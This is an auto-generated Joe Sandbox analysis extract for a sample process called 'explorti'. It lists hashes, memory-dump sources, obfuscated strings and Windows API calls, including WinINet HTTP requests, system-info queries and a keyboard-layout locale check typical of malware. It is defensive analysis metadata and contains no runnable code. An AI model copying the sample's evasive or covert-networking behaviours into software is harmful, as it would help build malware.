                        • Instruction ID: 4c33a5e2b79ecc87f2590737ccd9783eab3ebf9f14fafbb5f71cebc7599bedab
                        • Opcode Fuzzy Hash: bf4e34dea14339b78c420d0185a85859683801022b8eda36c31018f5e8f7efa6
                        • Instruction Fuzzy Hash: 46B106B1A002189FEB24CF28CC84BADBB65EF45305F5041A9FA09972C2DB749EC4DF95
                        APIs
                          • Part of subcall function 00F67870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00F6795C
                          • Part of subcall function 00F67870: __Cnd_destroy_in_situ.LIBCPMT ref: 00F67968
                          • Part of subcall function 00F67870: __Mtx_destroy_in_situ.LIBCPMT ref: 00F67971
                          • Part of subcall function 00F5BD60: InternetOpenW.WININET(00FA8D68,00000000,00000000,00000000,00000000), ref: 00F5BDED
                          • Part of subcall function 00F5BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F5BE11
                          • Part of subcall function 00F5BD60: HttpOpenRequestA.WININET(?,00000000), ref: 00F5BE5B
                        • std::_Xinvalid_argument.LIBCPMT ref: 00F64EA2
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                        • String ID: 0657d1$246122658369$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$IEYUMK==$KIG+$KIK+$TZC0$TZS0$Toe0$UIU0$stoi argument out of range
                        • API String ID: 2414744145-1285461467
                        • Opcode ID: 8666145a33ae0b571204db0136686020c2ee26f2f055f30cac60b5f5d1cf03a2
                        • Instruction ID: f5c499a20033df799cbbb4f1e72f006cddebe0f7db0c379826e38d837917f1ee
                        • Opcode Fuzzy Hash: 8666145a33ae0b571204db0136686020c2ee26f2f055f30cac60b5f5d1cf03a2
                        • Instruction Fuzzy Hash: 66231871E001589BEB19DB28CD8979DBB769F81308F5482DCE009AB2D2DB399F84DF51

                        Control-flow Graph

                        [Control-flow graph not preserved in this extract. Entry block: f55df0-f55eee. API calls named in the graph: RegOpenKeyExA, RegEnumValueW.]
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload

                        Control-flow Graph

                        [Control-flow graph not preserved in this extract. Entry block: f57d00-f57d82. API call named in the graph: GetNativeSystemInfo.]
                        APIs
                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F57EA3
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID: Dp$HlurNa==$HlurOK==$HlusMa==

                        Control-flow Graph

                        [Control-flow graph not preserved in this extract. Entry block: f86e01-f86e36. API calls named in the graph: GetFileType, GetFileInformationByHandle.]
                        APIs
                        • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00F86E23
                        • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00F86E7D
                        • __dosmaperr.LIBCMT ref: 00F86F12
                          • Part of subcall function 00F87177: __dosmaperr.LIBCMT ref: 00F871AC
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Similarity
                        • API ID: File__dosmaperr$HandleInformationType

                        Control-flow Graph

                        [Control-flow graph not preserved in this extract. Entry block: f582b0-f58331. API call named in the graph: GetNativeSystemInfo.]
                        APIs
                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00F58454
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Similarity
                        • API ID: InfoNativeSystem

                        Control-flow Graph

                        [Control-flow graph not preserved in this extract. Entry block: f86c99-f86ca5. API call named in the graph: CreateFileW.]
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true

                        Control-flow Graph

                        [Control-flow graph not preserved in this extract. Entry block: f86f71-f86f87. API call named in the graph: SystemTimeToTzSpecificLocalTime.]
                        APIs
                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00F86FB3
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Similarity
                        • API ID: Time$LocalSpecificSystem

                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Similarity
                        • API ID: Sleep

                        Control-flow Graph

                        [Control-flow graph not preserved in this extract. Entry block: 4be0cea-4be0cf3.]
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

                        Control-flow Graph

                        [Control-flow graph not preserved in this extract. Entry block: 4be0cdb-4be0dd8.]
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_4be0000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 507e6f993357370732669750148a0ab56fad4c7891c5d0bfd7628fe31cf1618d
                        • Instruction ID: 3b7022de0f49ee52b10b1273022096d7bdea49bc30fe2d0c1a51bc5698956a00
                        • Opcode Fuzzy Hash: 507e6f993357370732669750148a0ab56fad4c7891c5d0bfd7628fe31cf1618d
                        • Instruction Fuzzy Hash: 9001F7BB20C225AEA141E6936A049FB77AAE6C1330731C46BF842C6502E3D9A9497631
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_4be0000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 108d4a3075863026e80f2f0d16da4f3c95b70d89efb326f712f54f4aebc5c360
                        • Instruction ID: d21c858d9f30c355f12680284d5b799005b1b17d009aa975865853f1eeb34511
                        • Opcode Fuzzy Hash: 108d4a3075863026e80f2f0d16da4f3c95b70d89efb326f712f54f4aebc5c360
                        • Instruction Fuzzy Hash: BCF0C8E710C1217EE11191666F15AF75B9ED3C6730B31C866F883C2587E3D9558A6232
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_4be0000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9e2ed1e10517ec02b9f6ef5274edf61256e8c7c7f58c8b4a90f96a92d81f0d50
                        • Instruction ID: e8ffb6fdc835056272e1e57ee7a3d86704a87ec0dd64cb4650b999a00b89a069
                        • Opcode Fuzzy Hash: 9e2ed1e10517ec02b9f6ef5274edf61256e8c7c7f58c8b4a90f96a92d81f0d50
                        • Instruction Fuzzy Hash: 1EF02DF720C2716EA10295926B109FB6BAEE5D7730331D8ABF842C2503F3D95D4A7531
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_4be0000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 17f51baf4fd0fef9938ced16110c55399399cf71dc6daa4837c68dbdbb22a761
                        • Instruction ID: b85e68d3198ef30d3be0e0d8d5b85190916d9618188e0042502391e620134af0
                        • Opcode Fuzzy Hash: 17f51baf4fd0fef9938ced16110c55399399cf71dc6daa4837c68dbdbb22a761
                        • Instruction Fuzzy Hash: F5F0E2E720C1317EB002A1936F11AFB579ED2C6730731CC66B883C3582E3C9298A7132
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: #$0657d1$111$246122658369$EpPoaRV1$KIG+$KS==$SC==$UFy=$UVu=$UVy=
                        • API String ID: 0-3836280467
                        • Opcode ID: 10afbd7a74a26857f7d82d3e7227cb20a1fdf16c0d1ce5b62cba074091f29471
                        • Instruction ID: 36a7646f1f5227173ce38dd4c96d5a01fddeb6fd0351543ec23859a32933ce87
                        • Opcode Fuzzy Hash: 10afbd7a74a26857f7d82d3e7227cb20a1fdf16c0d1ce5b62cba074091f29471
                        • Instruction Fuzzy Hash: 1182F670914248DBEF14EF68CD497DD7FB6AB46308F608188E805673C2D7799A88DBD2
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: c5f003ae5a1860482b5eab971d96e9d47f0826fae18d6c23428c0c9e04fd8b7c
                        • Instruction ID: e5b0e64e3bd033848390bf4dba649afad0862d36d2bc039e6c6668116c038349
                        • Opcode Fuzzy Hash: c5f003ae5a1860482b5eab971d96e9d47f0826fae18d6c23428c0c9e04fd8b7c
                        • Instruction Fuzzy Hash: 7BC23D72E046288FEF25CE28DD40BEAB3B5EB48315F1441EAD44DE7240E779AE859F41
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                        • Instruction ID: 5b2b519a5ff8447825bcab953fc47d119a4a85cc9bfb43dc44328d857a67ff58
                        • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                        • Instruction Fuzzy Hash: 2AF14171E012199FDF14CFA9C8806ADF7B1FF48324F15826AD519A7345D7319E41DB90
                        APIs
                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,00F6CE82,?,?,?,?,00F6CEB7,?,?,?,?,?,?,00F6C42D,?,00000001), ref: 00F6CB33
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FilePreciseSystem
                        • String ID:
                        • API String ID: 1802150274-0
                        • Opcode ID: 7e8c4584d346c466a15e3af92d9978ba15b9564a2ea6a1e0ef2e0d9abbb68037
                        • Instruction ID: 55f94cf22acd30cea5882dc51620a8511805c4e40a8aea54e10558d965f81e99
                        • Opcode Fuzzy Hash: 7e8c4584d346c466a15e3af92d9978ba15b9564a2ea6a1e0ef2e0d9abbb68037
                        • Instruction Fuzzy Hash: C3D02232A0213CA3CA113BA4BC04ABCBB098B41B643000221E988231208A606C00BBD0
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                        • Instruction ID: 26fc057ea89351d12ee6e9edf4b8acdd109e8fecea73093da4c9b9938490ae3a
                        • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                        • Instruction Fuzzy Hash: DD51CA72A0CB4857CB38FA3888D67FEBB9A9F51360F38049DE442CB682CA15DD45B351
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7d818c2093897374175b48bf8292bf81218b4d94fde30976cf5747b0a1305cc
                        • Instruction ID: 6048f1f31caa0b5f8005c60e04b7f1958a00fff4a638e742f0c9b224d4df54fc
                        • Opcode Fuzzy Hash: c7d818c2093897374175b48bf8292bf81218b4d94fde30976cf5747b0a1305cc
                        • Instruction Fuzzy Hash: C72260B3F515144BDB0CCB9DDCA27ECB2E3AFD8214B0E813DA40AE3345EA79D9159A44
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9cb064c7d85ac70d2c22562bca80d69fd65f0ef42b181d29150225b1ad3a626c
                        • Instruction ID: b338e8cf47d3a77be2d19834b4396283306cf9408e50992084114260de695efe
                        • Opcode Fuzzy Hash: 9cb064c7d85ac70d2c22562bca80d69fd65f0ef42b181d29150225b1ad3a626c
                        • Instruction Fuzzy Hash: F5B15E32A24705DFEB19DF28C486B657BE0FF45364F258658E899CF2A1C336E981DB40
                        APIs
                        • ___std_exception_copy.LIBVCRUNTIME ref: 00F5247E
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___std_exception_copy
                        • String ID:
                        • API String ID: 2659868963-0
                        • Opcode ID: 7c5db725bb21bf6b34df665e3df01dd0ab11178c319258b39b0e96493e3790e4
                        • Instruction ID: 710e6a1a7cf63a017da4268f17e0f8cbfd08c61254c78c39f3bd35352cc743ef
                        • Opcode Fuzzy Hash: 7c5db725bb21bf6b34df665e3df01dd0ab11178c319258b39b0e96493e3790e4
                        • Instruction Fuzzy Hash: 0C519CB2E006098FDB15EF58D8C17AABBF4FB58320F24866AD404EB294D7799940EF50
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9d2a49bdc71cbf212176daa0ab31cb0b3f22d6b32f8f1c4d125472623b226e06
                        • Instruction ID: c0942b5e2c5d5169a8ed5652752cf9a8897029d3520cc6dd4376bbe6084d6034
                        • Opcode Fuzzy Hash: 9d2a49bdc71cbf212176daa0ab31cb0b3f22d6b32f8f1c4d125472623b226e06
                        • Instruction Fuzzy Hash: 6351D37060C3928FC319CF2C841523ABFE1BFC6201F084A9EE5E687242D774E548DBA2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9bc913bfd5e33d4d5774c5b74648c2c8e7b1ecc0b508d54772e825f8c8cdfb18
                        • Instruction ID: e760e53667457c61b147265a1529419233988c960940a6bf97ce0c785f60e1ae
                        • Opcode Fuzzy Hash: 9bc913bfd5e33d4d5774c5b74648c2c8e7b1ecc0b508d54772e825f8c8cdfb18
                        • Instruction Fuzzy Hash: 2721B673F205394B7B0CC47E8C5727DB6E1C68C541745423AE8A6EA2C1D96CD917E2E4
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d56335f7eb42eb5a54d04aaa630069ac9cb9bad97fb9c25be0b6d216c8c9a893
                        • Instruction ID: 779551e7dfd08d41524ab2afbd93d2071ba860c62720e201fbae0a15fb925874
                        • Opcode Fuzzy Hash: d56335f7eb42eb5a54d04aaa630069ac9cb9bad97fb9c25be0b6d216c8c9a893
                        • Instruction Fuzzy Hash: 8411CA23F30D255B775C817D8C1327AA1D2EBD824030F433AD826EB384E994DE23D290
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction ID: f62d5ab99332d98a8b09509c97b1020668fad429690269b5673e330cf9f634f7
                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction Fuzzy Hash: EC11087BA0014147FE048AADD9F46B6A796EAC73B1B3C437AD0424B758DA22D947F902
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 59567200ebd2b7f9e344924961774f176884c87e38ce2acf20fbfffeab3cc738
                        • Instruction ID: cd259d2515b4fc1c2ab70302affb9c2cb0da5d036bf65a39e5f568b06b563f80
                        • Opcode Fuzzy Hash: 59567200ebd2b7f9e344924961774f176884c87e38ce2acf20fbfffeab3cc738
                        • Instruction Fuzzy Hash: C5E08C30240B086FDF39BF14DC68D9C3B5AEB52354F104800FC0486222CB6AED91EB81
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                        • Instruction ID: 5ea9494c326aff467b32ba7d0f5b6a3c81fe01b01cba7f91048dbb986646c3ab
                        • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                        • Instruction Fuzzy Hash: 18E04632A11628EBCB15EB88890898AF2ACEB48B10F154096B501D3240C274DF00DBD0
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 246122658369$6JLUcxtnEx==$Dy==$FAml$UFy=$invalid stoi argument$stoi argument out of range
                        • API String ID: 0-3273830296
                        • Opcode ID: d712a2269bcc559997332269f275ba441513fb43cc1177de95c8134fdd8520bc
                        • Instruction ID: 97a1bf115ca5b8cf425fb08fe0a8272d6d3d95ab0e857401bbbc4bc40eccf39f
                        • Opcode Fuzzy Hash: d712a2269bcc559997332269f275ba441513fb43cc1177de95c8134fdd8520bc
                        • Instruction Fuzzy Hash: E202B270E00248EFEF14EFA8CC59BDEBBB5AF05314F544158E805A7282D7799A44DBA2
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: _wcsrchr
                        • String ID: .bat$.cmd$.com$.exe
                        • API String ID: 1752292252-4019086052
                        • Opcode ID: 00379fa1f1e5af1180aa72b61c3f0aecb283b9521767f84457a0b3e8a8346187
                        • Instruction ID: 73e7aae21a21fd08f859faa67df5d83158c4e4ba699bccb75ecaf97f33195285
                        • Opcode Fuzzy Hash: 00379fa1f1e5af1180aa72b61c3f0aecb283b9521767f84457a0b3e8a8346187
                        • Instruction Fuzzy Hash: 6401C827B18B16266618741D9C427BB27989B83BB4735002AF944F77C1DE88DC427391
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Mtx_unlock$Cnd_broadcast
                        • String ID:
                        • API String ID: 32384418-0
                        • Opcode ID: 5c01dd5fc61310c882e2b0fbf8832305921df14969b979468e355dd4edcf8804
                        • Instruction ID: 7d885e7802b4c6df6c750bc1806ca82ff11cd3cc9b0490958282ada172294b71
                        • Opcode Fuzzy Hash: 5c01dd5fc61310c882e2b0fbf8832305921df14969b979468e355dd4edcf8804
                        • Instruction Fuzzy Hash: 73A1F071E007059FDB11DB68CD4476AB7E8BF06369F044229E946D7282EB34EA08EBD1
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: _strrchr
                        • String ID:
                        • API String ID: 3213747228-0
                        • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                        • Instruction ID: cc5867fdf026f2bf2bb8427c3e0718343d6106db57cca92af0f08f8802f75451
                        • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                        • Instruction Fuzzy Hash: 43B13632D006859FDB15EF28C851BFEBBE5EF96350F1481AAE845DB241D6388D41EBB0
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xtime_diff_to_millis2_xtime_get
                        • String ID:
                        • API String ID: 531285432-0
                        • Opcode ID: b91840e6a0aabf8d261c6d7a0865cd7207f118dbb55e203507ff1dbc520e45a8
                        • Instruction ID: 7af07d28c7b44d9018ab06723456e0ad33433af8abe250bba9b5faf63e3e24d5
                        • Opcode Fuzzy Hash: b91840e6a0aabf8d261c6d7a0865cd7207f118dbb55e203507ff1dbc520e45a8
                        • Instruction Fuzzy Hash: 32216271E01219AFDF10EFA4DC859BEBBB8EF48710F000065F541A7251DB35AD41ABE1